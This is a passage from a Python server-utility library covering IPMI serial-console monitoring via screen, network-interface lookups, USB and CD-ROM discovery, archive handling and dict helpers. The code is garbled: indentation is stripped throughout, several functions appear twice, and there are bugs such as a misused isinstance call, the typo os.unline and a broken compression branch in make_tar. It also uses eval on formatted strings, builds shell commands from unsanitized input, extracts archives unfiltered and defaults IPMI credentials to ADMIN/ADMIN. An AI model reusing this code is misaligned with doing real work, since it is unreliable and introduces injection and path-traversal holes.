# strs='0aA-1b+2Bc=C3d_D,4.eE?5"fF6g7G!h8H@i9#Ij$JkK%lLmMn^N&oO*p(Pq)Q/r\Rs:St;TuUv{V<wW}x[Xy>Y]z|Z'
# elif mode in ['alphachar']:
# strs='aA-b+Bc=Cd_D,.eE?"fFgG!hH@i#Ij$JkK%lLmMn^N&oO*p(Pq)Q/r\Rs:St;TuUv{V<wW}x[Xy>Y]z|Z'
# elif mode in ['alphanum']:
# strs='aA1b2BcC3dD4eE5fF6g7Gh8Hi9IjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ'
# elif mode in ['char']:
# strs='-+=_,.?"!@#$%^&*()/\:;{<}x[>]|'
# else:
# strs='aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ'
if not strs: strs=string.ascii_letters
strn=len(strs)-1
for i in range(0,length):
new='{0}{1}'.format(new,strs[random.randint(0,strn)])
return new
def Keys(src,find=None,start=None,end=None,sym='\n',default=[],word=False,pattern=False,findall=False,out=None):
rt=[]
if isinstance(src,str,list,tuple) and find:
if isinstance(src,str): src=src.split(sym)
for row in range(0,len(src)):
for ff in FIND().Find(find,src=src[row],pattern=pattern,word=word,findall=findall,default=[],out=list):
if findall:
rt=rt+[(row,[m.start() for m in re.finditer(ff,src[row])])]
else:
idx=src[row].index(ff,start,end)
if idx >= 0:
rt.append((row,idx))
elif isinstance(src,dict):
if find is None:
if out in ['raw',None] and len(src.keys()) == 1 : return list(src.keys())[0]
if out in ['tuple',tuple]: return tuple(list(src.keys()))
return list(src.keys())
# if it has found need code for recurring search at each all data and path of keys
# return [ (keypath,[found data]), .... ]
#elif Type(src,'instance','classobj'):
# if src is instance or classobj then search in description and made function name at key
if rt:
if out in ['tuple',tuple]: return tuple(rt)
if out not in ['list',list] and len(rt) == 1 and rt[0][0] == 0:
if len(rt[0][1]) == 1:return rt[0][1][0]
return rt[0][1]
return rt
return default
class SCREEN:
def Kill(self,title):
ids=self.Id(title)
if len(ids) == 1:
rc=rshell('''screen -X -S {} quit'''.format(ids[0]))
if rc[0] == 0:
return True
return False
def Monitor(self,title,ip,ipmi_user,ipmi_pass,find=[],timeout=600):
if type(title) is not str or not title:
print('no title')
return False
scr_id=self.Id(title)
if scr_id:
print('Already has the title at {}'.format(scr_id))
return False
cmd="ipmitool -I lanplus -H {} -U {} -P {} sol activate".format(ip,ipmi_user,ipmi_pass)
# Linux OS Boot (Completely kernel loaded): find=['initrd0.img','\xff']
# PXE Boot prompt: find=['boot:']
# PXE initial : find=['PXE ']
# DHCP initial : find=['DHCP']
# ex: aa=screen_monitor('test','ipmitool -I lanplus -H <bmc ip> -U ADMIN -P ADMIN sol activate',find=['initrd0.img','\xff'],timeout=300)
log_file=self.Log(title,cmd)
init_time=TIME().Int()
if log_file:
mon_line=0
old_mon_line=-1
found=0
find_num=len(find)
cnt=0
while True:
if TIME().Int() - init_time > timeout :
print('Monitoring timeout({} sec)'.format(timeout))
if self.Kill(title):
os.unlink(log_file)
break
with open(log_file,'rb') as f:
tmp=f.read()
#tmp=_u_byte2str(tmp)
tmp=CONVERT(tmp).Str()
if '\x1b' in tmp:
tmp_a=tmp.split('\x1b')
elif '\r\n' in tmp:
tmp_a=tmp.split('\r\n')
elif '\r' in tmp:
tmp_a=tmp.split('\r')
else:
tmp_a=tmp.split('\n')
tmp_n=len(tmp_a)
for ss in tmp_a[tmp_n-2:]:
if 'SOL Session operational' in ss:
# control+c : "^C", Enter: "^M", any command "<linux command> ^M"
rshell('screen -S {} -p 0 -X stuff "^M"'.format(title))
cnt+=1
if cnt > 5:
print('maybe not activated SOL or BMC issue')
if self.Kill(title):
os.unlink(log_file)
return False
continue
if find:
for ii in tmp_a[mon_line:]:
if find_num == 0:
print(ii)
else:
for ff in range(0,find_num):
find_i=find[found]
if ii.find(find_i) < 0:
break
found=found+1
if found >= find_num:
if self.Kill(title):
os.unlink(log_file)
return True
if tmp_n > 1:
mon_line=tmp_n -1
else:
mon_line=tmp_n
else:
if self.Kill(title):
os.unlink(log_file)
return True
TIME().Sleep(1)
return False
def Id(self,title=None):
scs=[]
rc=rshell('''screen -ls''')
if rc[0] == 1:
for ii in rc[1].split('\n')[1:]:
jj=ii.split()
if len(jj) == 2:
if title:
zz=jj[0].split('.')
if zz[1] == title:
scs.append(jj[0])
else:
scs.append(jj[0])
return scs
def Log(self,title,cmd):
# ipmitool -I lanplus -H 172.16.114.80 -U ADMIN -P ADMIN sol activate
pid=os.getpid()
tmp_file=FILE().MkTemp('/tmp/.slc.{}_{}.cfg'.format(title,pid))
log_file=FILE().MkTemp('/tmp/.screen_ck_{}_{}.log'.format(title,pid))
if os.path.isfile(log_file):
log_file=''
with open(tmp_file,'w') as f:
f.write('''logfile {}\nlogfile flush 0\nlog on\n'''.format(log_file))
if os.path.isfile(tmp_file):
rc=rshell('''screen -c {} -dmSL "{}" {}'''.format(tmp_file,title,cmd))
if rc[0] == 0:
for ii in range(0,50):
if os.path.isfile(log_file):
os.unlink(tmp_file)
return log_file
TIME().Sleep(0.1)
def findXML(xmlfile,find_name=None,find_path=None):
tree=ET.parse(xmlfile)
#root=ET.fromstring(data)
root=tree.getroot()
def find(tr,find_name):
for x in tr:
if x.attrib.get('name') == find_name:
return x,x.tag
rt,pp=find(x,find_name)
if rt:
return rt,'{}/{}'.format(x.tag,pp)
return None,None
found_root=None
if find_name:
found=find(root,find_name)
if found[0]:
found_root=found[0]
if find_path and isinstance(find_path,str):
#ex: root.findall('./Menu/Setting/[@name="Administrator Password"]/Information/HasPassword'):
if not found_root: found_root=root
return found_root.findall(find_path)
# <element>.tag: name, .text: data, .attrib: dict
def get_iso_uid(filename):
if type(filename) is not str:
return False,None,None
if os.path.exists(filename):
uid_cmd='''sudo /usr/sbin/blkid {}'''.format(filename)
rc=rshell(uid_cmd)
if rc[0] == 0:
uid_str='{0}_{1}'.format(findstr(rc[1],'UUID="(\w.*)" L')[0],findstr(rc[1],'LABEL="(\w.*)" T')[0]).replace(' ','_')
file_info=get_file(filename)
file_size=file_info.get('size',None)
return True,uid_str,file_size
return False,rc[1],None
return False,'{} not found'.format(filename),None
def git_ver(git_dir=None):
if git_dir is not None and os.path.isdir('{0}/.git'.format(git_dir)):
gver=rshell('''cd {0} && git describe --tags'''.format(git_dir))
if gver[0] == 0:
return gver[1]
def Compress(data,mode='lz4'):
if mode == 'lz4':
return frame.compress(data)
elif mode == 'bz2':
return bz2.compress(data)
def Decompress(data,mode='lz4',work_path='/tmp',del_org_file=False,file_info={}):
def FileName(filename):
if isinstance(filename,str):
filename_info=os.path.basename(filename).split('.')
if 'tar' in filename_info:
idx=filename_info.index('tar')
else:
idx=-1
return '.'.join(filename_info[:idx]),'.'.join(filename_info[idx:])
return None,None
def FileType(filename,default=False):
if not isinstance(filename,str) or not os.path.isfile(filename): return default
aa=magic.from_buffer(open(filename,'rb').read(2048))
if aa: return aa.split()[0].lower()
return 'unknown'
if mode == 'lz4':
return frame.decompress(data)
elif mode == 'bz2':
return bz2.BZ2Decompressor().decompress(data)
elif mode == 'file' and isinstance(data,str) and os.path.isfile(data):
filename,fileextfile_info=FileName(data)
filetype=FileType(data)
if filetype and fileext:
# Tar stuff
if fileext in ['tgz','tar','tar.gz','tar.bz2','tar.xz'] and filetype in ['gzip','tar','bzip2','lzma','xz','bz2']:
tf=tarfile.open(data)
tf.extractall(work_path)
tf.close()
elif fileext in ['zip'] and filetype in ['compress']:
with zipfile.ZipFile(data,'r') as zf:
zf.extractall(work_path)
if del_org_file: os.unline(data)
return True
def get_dev_name_from_mac(mac):
net_dir='/sys/class/net'
if type(mac) is str and os.path.isdir(net_dir):
dirpath,dirnames,filenames = list(os.walk(net_dir))[0]
for dev in dirnames:
fmac=cat('{}/{}/address'.format(dirpath,dev),no_end_newline=True)
if type(fmac) is str and fmac.strip().lower() == mac.lower():
return dev
def get_dev_mac(ifname):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
except:
return
def get_net_device(name=None):
net_dev={}
net_dir='/sys/class/net'
if os.path.isdir(net_dir):
dirpath,dirnames,filenames = list(os.walk(net_dir))[0]
if name:
if name in dirnames:
drv=ls('{}/{}/device/driver/module/drivers'.format(dirpath,name))
if drv is False:
drv='unknown'
else:
drv=drv[0].split(':')[1]
net_dev[name]={
'mac':cat('{}/{}/address'.format(dirpath,name),no_end_newline=True),
'duplex':cat('{}/{}/duplex'.format(dirpath,name),no_end_newline=True),
'mtu':cat('{}/{}/mtu'.format(dirpath,name),no_end_newline=True),
'state':cat('{}/{}/operstate'.format(dirpath,name),no_end_newline=True),
'speed':cat('{}/{}/speed'.format(dirpath,name),no_end_newline=True),
'id':cat('{}/{}/ifindex'.format(dirpath,name),no_end_newline=True),
'driver':drv,
'drv_ver':cat('{}/{}/device/driver/module/version'.format(dirpath,name),no_end_newline=True),
}
else:
for dev in dirnames:
drv=ls('{}/{}/device/driver/module/drivers'.format(dirpath,dev))
if drv is False:
drv='unknown'
else:
drv=drv[0].split(':')[1]
net_dev[dev]={
'mac':cat('{}/{}/address'.format(dirpath,dev),no_end_newline=True),
'duplex':cat('{}/{}/duplex'.format(dirpath,dev),no_end_newline=True),
'mtu':cat('{}/{}/mtu'.format(dirpath,dev),no_end_newline=True),
'state':cat('{}/{}/operstate'.format(dirpath,dev),no_end_newline=True),
'speed':cat('{}/{}/speed'.format(dirpath,dev),no_end_newline=True),
'id':cat('{}/{}/ifindex'.format(dirpath,dev),no_end_newline=True),
'driver':drv,
'drv_ver':cat('{}/{}/device/driver/module/version'.format(dirpath,dev),no_end_newline=True),
}
return net_dev
else:
return False
def find_cdrom_dev(size=None):
load_kmod(['sr_mod','cdrom','libata','ata_piix','ata_generic','usb-storage'])
if os.path.isdir('/sys/block') is False:
return
for r, d, f in os.walk('/sys/block'):
for dd in d:
for rrr,ddd,fff in os.walk(os.path.join(r,dd)):
if 'removable' in fff:
with open('{0}/removable'.format(rrr),'r') as fp:
removable=fp.read()
if '1' in removable:
if os.path.isfile('{0}/device/model'.format(rrr)):
with open('{0}/device/model'.format(rrr),'r') as fpp:
model=fpp.read()
for ii in ['CDROM','DVD-ROM','DVD-RW']:
if ii in model:
if size is None:
return '/dev/{0}'.format(dd)
else:
if os.path.exists('{}/size'.format(rrr)):
with open('{}/size'.format(rrr),'r') as fss:
block_size=fss.read()
dev_size=int(block_size) * 512
if dev_size == int(size):
return '/dev/{0}'.format(dd)
def find_usb_dev(size=None,max_size=None):
rc=[]
load_kmod(modules=['usb-storage'])
if os.path.isdir('/sys/block') is False:
return
for r, d, f in os.walk('/sys/block'):
for dd in d:
for rrr,ddd,fff in os.walk(os.path.join(r,dd)):
if 'removable' in fff:
removable=cat('{0}/removable'.format(rrr))
if removable:
if '1' in removable:
if size is None:
if max_size:
file_size=cat('{0}/size'.format(rrr))
if file_size:
dev_size=int(file_size) * 512
if dev_size <= int(max_size):
rc.append('/dev/{0}'.format(dd))
else:
rc.append('/dev/{0}'.format(dd))
else:
file_size=cat('{0}/size'.format(rrr))
if file_size:
dev_size=int(file_size) * 512
if dev_size == int(size):
rc.append('/dev/{0}'.format(dd))
return rc
##########################################################################################
def append(src,addendum):
type_src=type(src)
type_data=type(addendum)
if src is None:
if type_data is str:
src=''
elif type_data is dict:
src={}
elif type_data is list:
src=[]
elif type_data is tuple:
src=()
type_src=type(src)
if addendum is None:
return src
if type_src == type_data:
if type_src is dict:
return src.update(addendum)
elif type_src in [list,tuple]:
src=list(src)
for ii in addendum:
if ii not in src:
src.append(ii)
if type_src is tuple:
src=tuple(src)
return src
elif type_src is str:
return src+addendum
return False
def compare(a,sym,b,ignore=None):
if type(a) is not int or type(b) is not int:
return False
if ignore is not None:
if eval('{} == {}'.format(a,ignore)) or eval('{} == {}'.format(b,ignore)):
return False
return eval('{} {} {}'.format(a,sym,b))
def integer(a,default=0):
try:
return int(a)
except:
return default
def Delete(*inps,**opts):
if len(inps) >= 2:
obj=inps[0]
keys=inps[1:]
elif len(inps) == 1:
obj=inps[0]
keys=opts.get('key',None)
if isinstance(keys,list):
keys=tuple(keys)
elif keys is not None:
keys=(keys,)
default=opts.get('default',None)
_type=opts.get('type','index')
if isinstance(obj,(list,tuple)):
nobj=len(obj)
rt=[]
if _type == 'index':
nkeys=Abs(*tuple(keys),obj=obj,out=list)
for i in range(0,len(obj)):
if i not in nkeys:
rt.append(obj[i])
else:
for i in obj:
if i not in keys:
rt.append(i)
return rt
elif isinstance(obj,dict):
if isinstance(keys,(list,tuple,dict)):
for key in keys:
obj.pop(key,default)
else:
obj.pop(keys,default)
return obj
elif isinstance(obj,str):
nkeys=[]
for i in keys:
if isinstance(i,(tuple,str,int)):
tt=Abs(i,obj=obj,out=list)
if tt:
nkeys=nkeys+tt
rt=''
for i in range(0,len(obj)):
if i in nkeys:
continue
rt=rt+obj[i]
return rt
return default
def get_data(data,key=None,ekey=None,default=None,method=None,strip=True,find=[],out_form=str):
if argtype(data,'Request'):
if key:
if method is None:
method=data.method
if method.upper() == 'GET':
rc=data.GET.get(key,default)
elif method == 'FILE':
if out_form is list:
rc=data.FILES.getlist(key,default)
else:
rc=data.FILES.get(key,default)
else:
if out_form is list:
rc=data.POST.getlist(key,default)
else:
rc=data.POST.get(key,default)
if argtype(rc,str) and strip:
rc=rc.strip()
if find and rc in find:
return True
if rc == 'true':
return True
elif rc == '':
return default
return rc
else:
if data.method == 'GET':
return data.GET
else:
return data.data
else:
type_data=type(data)
if type_data in [tuple,list]:
if len(data) > key:
if ekey and len(data) > ekey:
return data[key:ekey]
else:
return data[key]
elif type_data is dict:
return data.get(key,default)
return default
def check_value(src,find,idx=None):
'''Check key or value in the dict, list or tuple then True, not then False'''
if isinstance(src, (list,tuple,str,dict)):
if idx is None:
for i in src:
if IsSame(i,find): return True
else:
if isinstance(src,str):
if idx < 0:
if src[idx-len(find):idx] == find:
return True
else:
if src[idx:idx+len(find)] == find:
return True
else:
if Get(src,idx,out='raw') == find:
return True
return False
def ping(host,**opts):
count=opts.get('count',0)
interval=opts.get('interval',1)
keep_good=opts.get('keep_good',0)
timeout=opts.get('timeout',opts.get('timeout_sec',5))
lost_mon=opts.get('lost_mon',False)
log=opts.get('log',None)
stop_func=opts.get('stop_func',None)
log_format=opts.get('log_format','.')
cancel_func=opts.get('cancel_func',None)
return IP().Ping(host=host,count=count,interval=interval,keep_good=keep_good, timeout=timeout,lost_mon=lost_mon,log=log,stop_func=stop_func,log_format=log_format,cancel_func=cancel_func)
def is_lost(ip,**opts):
timeout=opts.get('timeout',opts.get('timeout_sec',1800))
interval=opts.get('interval',5)
stop_func=opts.get('stop_func',None)
cancel_func=opts.get('cancel_func',None)
log=opts.get('log',None)
init_time=None
if not ping(ip,count=3):
if not ping(ip,count=0,timeout=timeout,keep_good=30,interval=2,stop_func=stop_func,log=log,cancel_func=cancel_func):
return True,'Lost network'
return False,'OK'
def is_comeback(ip,**opts):
timeout=opts.get('timeout',opts.get('timeout_sec',1800))
interval=opts.get('interval',3)
keep=opts.get('keep',20)
stop_func=opts.get('stop_func',None)
cancel_func=opts.get('cancel_func',None)
log=opts.get('log',None)
init_time=None
run_time=TIME().Int()
if keep == 0 or keep is None:
return True,'N/A(Missing keep parameter data)'
if log:
log('[',direct=True,log_level=1)
time=TIME()
while True:
if time.Out(timeout):
if log:
log(']\n',direct=True,log_level=1)
return False,'Timeout monitor'
if is_cancel(cancel_func) or stop_func is True:
if log:
log(']\n',direct=True,log_level=1)
return True,'Stopped monitor by Custom'
if ping(ip,cancel_func=cancel_func):
if (TIME().Int() - run_time) > keep:
if log:
log(']\n',direct=True,log_level=1)
return True,'OK'
if log:
log('-',direct=True,log_level=1)
else:
run_time=TIME().Int()
if log:
log('.',direct=True,log_level=1)
TIME().Sleep(interval)
if log:
log(']\n',direct=True,log_level=1)
return False,'Timeout/Unknown issue'
def Join(*inps,symbol=''):
if len(inps) == 1 and isinstance(inps[0],(list,tuple)):
src=inps[0]
else:
src=inps
rt=''
for i in src:
if rt:
rt=rt+symbol+'{}'.format(i)
else:
rt='{}'.format(i)
return rt
def file_mode(val):
#return FILE().Mode(val)
if isinstance(val,int):
if val > 511:
return oct(val)[-4:]
elif val > 63:
return oct(val)
else:
val=_u_bytes2str(val)
if val:
cnt=len(val)
num=int(val)
if cnt >=3 and cnt <=4 and num >= 100 and num <= 777:
return int(val,8)
def get_file(filename,**opts):
#return FILE(filename,**opts)
md5sum=opts.get('md5sum',False)
data=opts.get('data',False)
include_dir=opts.get('include_dir',False)
include_sub_dir=opts.get('include_sub_dir',False)
def get_file_data(filename,root_path=None):
rc={'name':os.path.basename(filename),'path':os.path.dirname(filename),'exist':False,'dir':False,'link':False}
if root_path:
in_filename=os.path.join(root_path,filename)
else:
in_filename=filename
if os.path.exists(in_filename):
fstat=os.stat(in_filename)
rc['uid']=fstat.st_uid
rc['gid']=fstat.st_gid
rc['size']=fstat.st_size
rc['atime']=fstat.st_atime
rc['mtime']=fstat.st_mtime
rc['ctime']=fstat.st_ctime
rc['inod']=fstat.st_ino
rc['mode']=oct(fstat.st_mode)[-4:]
rc['exist']=True
if os.path.islink(in_filename):
rc['link']=True
else:
rc['link']=False
if os.path.isdir(in_filename):
rc['dir']=True
rc['path']=in_filename
rc['name']=''
else:
rc['dir']=False
if md5sum or data:
with open(in_filename,'rb') as f:
fdata=f.read()
if md5sum:
rc['md5']=md5(fdata)
if data:
rc['data']=fdata
return rc
rc={'exist':False,'includes':[]}
if type(filename) is str:
rc.update(get_file_data(filename))
if rc['dir']:
root_path=filename
real_filename=None
else:
root_path=os.path.dirname(filename)
real_filename=os.path.basename(filename)
if include_dir:
pwd=os.getcwd()
os.chdir(root_path)
for dirPath, subDirs, fileList in os.walk('.'):
for sfile in fileList:
curFile=os.path.join(dirPath.replace('./',''),sfile)
if curFile != real_filename:
rc['includes'].append(get_file_data(curFile,root_path))
if include_sub_dir is False:
break
os.chdir(pwd)
return rc
def save_file(data,dest):
# return data.Extract(dest=dest,sub_dir=True)
if not isinstance(data,dict) or not isinstance(dest,str) : return False
if os.path.isdir(dest) is False: os.system('mkdir -p {0}'.format(dest))
if data.get('dir'):
fmode=file_mode(data.get('mode'))
if fmode:
os.chmod(dest,fmode)
else:
# if file then save
new_file=os.path.join(dest,data['name'])
if 'data' in data:
with open(new_file,'wb') as f:
f.write(data['data'])
chmod_mode=file_mode(data.get('mode'))
if chmod_mode:
os.chmod(new_file,chmod_mode)
if 'includes' in data and data['includes']: # If include directory or files
for ii in data['includes']:
if ii['path']:
sub_dir=os.path.join(dest,ii['path'])
else:
sub_dir='{}'.format(dest)
if os.path.isdir(sub_dir) is False: os.system('mkdir -p {}'.format(sub_dir))
sub_file=os.path.join(sub_dir,ii['name'])
with open(sub_file,'wb') as f:
f.write(ii['data'])
chmod_mode=file_mode(ii.get('mode'))
if chmod_mode:
os.chmod(sub_file,chmod_mode)
class ANSI:
ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
def Clean(self,data):
if data:
if isinstance(data,str):
return self.ansi_escape.sub('',data)
elif isinstance(data,list):
new_data=[]
for ii in data:
new_data.append(self.ansi_escape.sub('',ii))
return new_data
return data
def cat(filename,no_end_newline=False):
tmp=FILE().Rw(filename)
tmp=Get(tmp,1)
if isinstance(tmp,str) and no_end_newline:
tmp_a=tmp.split('\n')
ntmp=''
for ii in tmp_a[:-1]:
if ntmp:
ntmp='{}\n{}'.format(ntmp,ii)
else:
ntmp='{}'.format(ii)
if len(tmp_a[-1]) > 0:
ntmp='{}\n{}'.format(ntmp,tmp_a[-1])
tmp=ntmp
return tmp
def ls(dirname,opt=''):
if os.path.isdir(dirname):
dirlist=[]
dirinfo=list(os.walk(dirname))[0]
if opt == 'd':
dirlist=dirinfo[1]
elif opt == 'f':
dirlist=dirinfo[2]
else:
dirlist=dirinfo[1]+dirinfo[2]
return dirlist
return False
#########################################################################
def is_cancel(func):
if func:
ttt=type(func).__name__
if ttt in ['function','instancemethod','method']:
if func(): return True
elif ttt == 'bool':
if func : return True
return False
def log_file_info(name):
log_file_str=''
if name and len(name) > 0:
if type(name) is str:
if name.split(':')[0] == 'log_file':
return name
name=name.split(',')
for nn in name:
if nn and nn != 'None':
if log_file_str:
log_file_str='{}:{}'.format(log_file_str,nn)
else:
log_file_str='{}'.format(nn)
if log_file_str:
return 'log_file:{}'.format(log_file_str)
def error_exit(msg=None):
if msg is not None:
print(msg)
sys.exit(-1)
def std_err(msg,direct=False):
if direct:
sys.stderr.write(msg)
else:
sys.stderr.write('{}\n'.format(msg))
sys.stderr.flush()
def log_format(*msg,**opts):
log_date_format=opts.get('date_format','[%m/%d/%Y %H:%M:%S]')
func_name=opts.get('func_name',False)
log_intro=opts.get('log_intro',3)
end_new_line=opts.get('end_new_line','')
start_new_line=opts.get('start_new_line','\n')
if len(msg) > 0:
m_str=None
intro=''
intro_space=''
if log_date_format:
intro=TIME().Format(tformat=log_date_format)+' '
if func_name or log_intro > 3:
if type(func_name) is str:
intro=intro+'{0} '.format(func_name)
else:
intro=intro+'{0}() '.format(get_caller_fcuntion_name())
if intro:
for i in range(0,len(intro)+1):
intro_space=intro_space+' '
for m in list(msg):
if m_str is None:
m_str='{0}{1}{2}{3}'.format(start_new_line,intro,m,end_new_line)
else:
m_str='{0}{1}{2}{3}{4}'.format(start_new_line,m_str,intro_space,m,end_new_line)
return m_str
def dget(dict=None,keys=None):
if dict is None or keys is None:
return False
tmp=dict.copy()
for ii in keys.split('/'):
if ii in tmp:
dtmp=tmp[ii]
else:
return False
tmp=dtmp
return tmp
def dput(dic=None,keys=None,val=None,force=False,safe=True):
if dic is not None and keys:
tmp=dic
keys_arr=keys.split('/')
keys_num=len(keys_arr)
for ii in keys_arr[:(keys_num-1)]:
if ii in tmp:
if type(tmp[ii]) == type({}):
dtmp=tmp[ii]
else:
if tmp[ii] == None:
tmp[ii]={}
dtmp=tmp[ii]
else:
if force:
vtmp=tmp[ii]
tmp[ii]={vtmp:None}
dtmp=tmp[ii]
else:
return False
else:
if force:
tmp[ii]={}
dtmp=tmp[ii]
else:
return False
tmp=dtmp
if val == '_blank_':
val={}
if keys_arr[keys_num-1] in tmp.keys():
if safe:
if tmp[keys_arr[keys_num-1]]:
return False
tmp.update({keys_arr[keys_num-1]:val})
return True
else:
if force:
tmp.update({keys_arr[keys_num-1]:val})
return True
return False
def sreplace(pattern,sub,string):
return re.sub('^%s' % pattern, sub, string)
def ereplace(pattern,sub,string):
return re.sub('%s$' % pattern, sub, string)
def md5(string):
return hashlib.md5(_u_bytes(string)).hexdigest()
def ipmi_cmd(cmd,ipmi_ip=None,ipmi_user='ADMIN',ipmi_pass='ADMIN',log=None):
if ipmi_ip is None:
ipmi_str=""" ipmitool {0} """.format(cmd)
else:
ipmi_str=""" ipmitool -I lanplus -H {0} -U {1} -P '{2}' {3} """.format(ipmi_ip,ipmi_user,ipmi_pass,cmd)
if log:
log(' ipmi_cmd():{}'.format(ipmi_str),log_level=7)
return rshell(ipmi_str)
def get_ipmi_mac(ipmi_ip=None,ipmi_user='ADMIN',ipmi_pass='ADMIN',loop=0):
ipmi_mac_str=None
if ipmi_ip is None:
ipmi_mac_str=""" ipmitool lan print 2>/dev/null | grep "MAC Address" | awk """
elif is_ipv4(ipmi_ip):
ipmi_mac_str=""" ipmitool -I lanplus -H {0} -U {1} -P {2} lan print 2>/dev/null | grep "MAC Address" | awk """.format(ipmi_ip,ipmi_user,ipmi_pass)
if ipmi_mac_str is not None:
ipmi_mac_str=ipmi_mac_str + """ '{print $4}' """
if not loop:
return rshell(ipmi_mac_str)
else:
for i in range(0,int(loop)):
mm=rshell(ipmi_mac_str)
if mm[1]:
return mm
time.sleep(3)
def get_ipmi_ip():
return rshell('''ipmitool lan print 2>/dev/null| grep "IP Address" | grep -v Source | awk '{print $4}' ''')
def get_host_name():
return socket.gethostname()
def get_host_ip(ifname=None,mac=None):
if ifname or mac:
if mac:
ifname=get_dev_name_from_mac(mac)
return get_net_dev_ip(ifname)
else:
ifname=get_default_route_dev()
if not ifname:
ifname=get_dev_name_from_mac()
if not ifname: ifname=get_dev_name_from_mac()
if ifname:
ip=get_net_dev_ip(ifname)
if ip:
return ip
return socket.gethostbyname(socket.gethostname())
def get_default_route_dev():
#for ii in cat('/proc/net/route').split('\n'):
for ii in STR(cat('/proc/net/route')).Split('\n'):
ii_a=ii.split()
if len(ii_a) > 8 and '00000000' == ii_a[1] and '00000000' == ii_a[7]: return ii_a[0]
def get_dev_name_from_mac(mac=None):
if mac is None:
mac=get_host_mac()
net_dir='/sys/class/net'
if type(mac) is str and os.path.isdir(net_dir):
dirpath,dirnames,filenames = list(os.walk(net_dir))[0]
for dev in dirnames:
fmac=cat('{}/{}/address'.format(dirpath,dev),no_end_newline=True)
if type(fmac) is str and fmac.strip().lower() == mac.lower():
return dev
def get_dev_mac(ifname):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
except:
return
def get_host_iface():
if os.path.isfile('/proc/net/route'):
routes=cat('/proc/net/route')
for ii in routes.split('\n'):
ii_a=ii.split()
if ii_a[2] == '030010AC':
return ii_a[0]
def get_host_mac(ip=None,dev=None):
if is_ipv4(ip):
dev_info=get_net_device()
if isinstance(dev_info,dict):
for dev in dev_info.keys():
if get_net_dev_ip(dev) == ip:
return dev_info[dev]['mac']
elif dev:
return get_dev_mac(dev)
else:
#return ':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff) for ele in range(0,8*6,8)][::-1])
return str2mac('%012x' % uuid.getnode())
def get_net_dev_ip(ifname):
if os.path.isdir('/sys/class/net/{}'.format(ifname)) is False:
return False
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
except:
try:
return os.popen('ip addr show {}'.format(ifname)).read().split("inet ")[1].split("/")[0]
except:
return
def get_net_device(name=None):
net_dev={}
net_dir='/sys/class/net'
if os.path.isdir(net_dir):
dirpath,dirnames,filenames = list(os.walk(net_dir))[0]
if name:
if name in dirnames:
drv=ls('{}/{}/device/driver/module/drivers'.format(dirpath,name))
if drv is False:
drv='unknown'
else:
drv=drv[0].split(':')[1]
net_dev[name]={
'mac':cat('{}/{}/address'.format(dirpath,name),no_end_newline=True),
'duplex':cat('{}/{}/duplex'.format(dirpath,name),no_end_newline=True),
'mtu':cat('{}/{}/mtu'.format(dirpath,name),no_end_newline=True),
'state':cat('{}/{}/operstate'.format(dirpath,name),no_end_newline=True),
'speed':cat('{}/{}/speed'.format(dirpath,name),no_end_newline=True),
'id':cat('{}/{}/ifindex'.format(dirpath,name),no_end_newline=True),
'driver':drv,
'drv_ver':cat('{}/{}/device/driver/module/version'.format(dirpath,name),no_end_newline=True),
}
else:
for dev in dirnames:
drv=ls('{}/{}/device/driver/module/drivers'.format(dirpath,dev))
if drv is False:
drv='unknown'
else:
drv=drv[0].split(':')[1]
net_dev[dev]={
'mac':cat('{}/{}/address'.format(dirpath,dev),no_end_newline=True),
'duplex':cat('{}/{}/duplex'.format(dirpath,dev),no_end_newline=True),
'mtu':cat('{}/{}/mtu'.format(dirpath,dev),no_end_newline=True),
'state':cat('{}/{}/operstate'.format(dirpath,dev),no_end_newline=True),
'speed':cat('{}/{}/speed'.format(dirpath,dev),no_end_newline=True),
'id':cat('{}/{}/ifindex'.format(dirpath,dev),no_end_newline=True),
'driver':drv,
'drv_ver':cat('{}/{}/device/driver/module/version'.format(dirpath,dev),no_end_newline=True),
}
return net_dev
else:
return False
def make_tar(filename,filelist,ctype='gz',ignore_file=[]):
def ignore_files(filename,ignore_files):
if isinstance(ignore_files,(list,tuple)):
for ii in ignore_files:
if isinstance(ii,str) and (ii == filename or filename.startswith(ii)): return True
elif isinstance(ignore_files,str):
if ignore_files == filename or filename.startswith(ignore_files): return True
return False
if ctype == 'bz2':
tar = tarfile.open(filename,"w:bz2")
elif ctype in ['stream',None,'tar']:
tar = tarfile.open(filename,"w:")
if ctype == 'xz':
tar = tarfile.open(filename,"w:xz")
else:
tar = tarfile.open(filename,"w:gz")
ig_dupl=[]
filelist_tmp=[]
filelist_type=type(filelist)
if filelist_type is list:
filelist_tmp=filelist
elif filelist_type is str:
filelist_tmp=filelist.split(',')
for ii in filelist_tmp:
if os.path.isfile(ii):
if ignore_files(ii,ignore_file): continue
ig_dupl.append(ii)
tar.add(ii)
elif os.path.isdir(ii):
for r,d,f in os.walk(ii):
if r in ignore_file or (len(d) == 1 and d[0] in ignore_file):
continue
for ff in f:
aa=os.path.join(r,ff)
if ignore_files(aa,ignore_file) or aa in ig_dupl: continue
ig_dupl.append(aa)
tar.add(aa)
else:
print('{} not found'.format(ii))
tar.close()
def is_tempfile(filepath,tmp_dir='/tmp'):
filepath_arr=filepath.split('/')
if len(filepath_arr) == 1:
return False
tmp_dir_arr=tmp_dir.split('/')
for ii in range(0,len(tmp_dir_arr)):
if filepath_arr[ii] != tmp_dir_arr[ii]:
return False
return True
def isfile(filename=None):
if filename is None:
return False
if len(filename) == 0:
return False
if os.path.isfile(filename):
return True
return False
def space(space_num=0,_space_=' '):
space_str=''
for ii in range(space_num):
space_str='{0}{1}'.format(space_str,_space_)
return space_str
def tap_print(string,bspace='',rc=False,NFLT=False):
rc_str=None
if type(string) is str:
for ii in string.split('\n'):
if NFLT:
